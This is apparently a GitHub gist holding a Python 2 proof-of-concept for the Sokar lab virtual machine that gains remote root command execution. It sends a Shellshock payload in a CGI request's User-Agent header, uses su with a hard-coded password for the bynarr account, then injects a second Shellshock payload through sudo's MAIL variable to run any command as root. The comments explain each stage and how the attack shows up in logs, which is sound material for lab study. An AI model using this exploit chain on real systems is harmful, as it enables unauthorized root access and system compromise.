
@leonjza
Last active August 29, 2015 14:15
Sokar Remote Root RCE
#!/usr/bin/python
# 2015 Leon Jacobs
# sokar remote root command execution
import requests
import sys
# Flat Python 2 proof-of-concept for the Sokar lab VM. One HTTP request carries
# a nested command line built from the templates below:
#   1. the User-Agent header starts with the bash function-definition prefix
#      "() { :;};" and is sent to a CGI endpoint;
#   2. the text after the prefix switches to the bynarr account with su;
#   3. as bynarr, /home/bynarr/lime is run through sudo with the same prefix
#      placed in the MAIL variable, followed by the operator's command.
# Defender's view: step 1 shows up in web-server logs as "() {" inside a
# request header. Step 3 depends on sudo handing a caller-supplied MAIL value
# to a bash that imports functions from the environment; which sudoers
# setting allows that on the VM is not visible here.
# NOTE: comments are kept ASCII-only because the file has no encoding line.

# Exactly one argument is expected: the command to embed in the request.
if len(sys.argv) < 2:
    print(" * Usage %s <cmd>" % sys.argv[0])
    sys.exit(1)

user_cmd = sys.argv[1].strip()

# Inner stage: the echo answers "N" on lime's stdin (presumably a prompt);
# user_cmd is pasted in unescaped, so its quoting has to survive three levels
# of shell and Python quoting.
sudo_template = """echo "N" | sudo MAIL=\\"() { :;}; %s;\\" /home/bynarr/lime"""
sudo_stage = sudo_template % user_cmd

# Middle stage: su needs a terminal, so it is spawned under a pty while a
# second python process writes 'fruity' (presumably the bynarr password, it is
# hard-coded here) to it after a one-second delay.
su_template = """/usr/bin/python -c "import time; time.sleep(1); print 'fruity'" | /usr/bin/python -c "import pty; pty.spawn(['/bin/su','-c','%s', 'bynarr']);" """
su_stage = su_template % sudo_stage

# Show the operator the full command line before anything is sent.
print(" * Executing %s\n" % su_stage)

# Outer stage: the whole chain travels in the User-Agent header. The "echo;"
# right after the prefix emits a blank line, presumably so the CGI response
# has a header/body separator.
request_headers = {"User-Agent": "() { :;};echo;%s" % su_stage}
target_url = "http://192.168.217.163:591/cgi-bin/cat"
response = requests.get(target_url, headers=request_headers)
print(response.text.strip())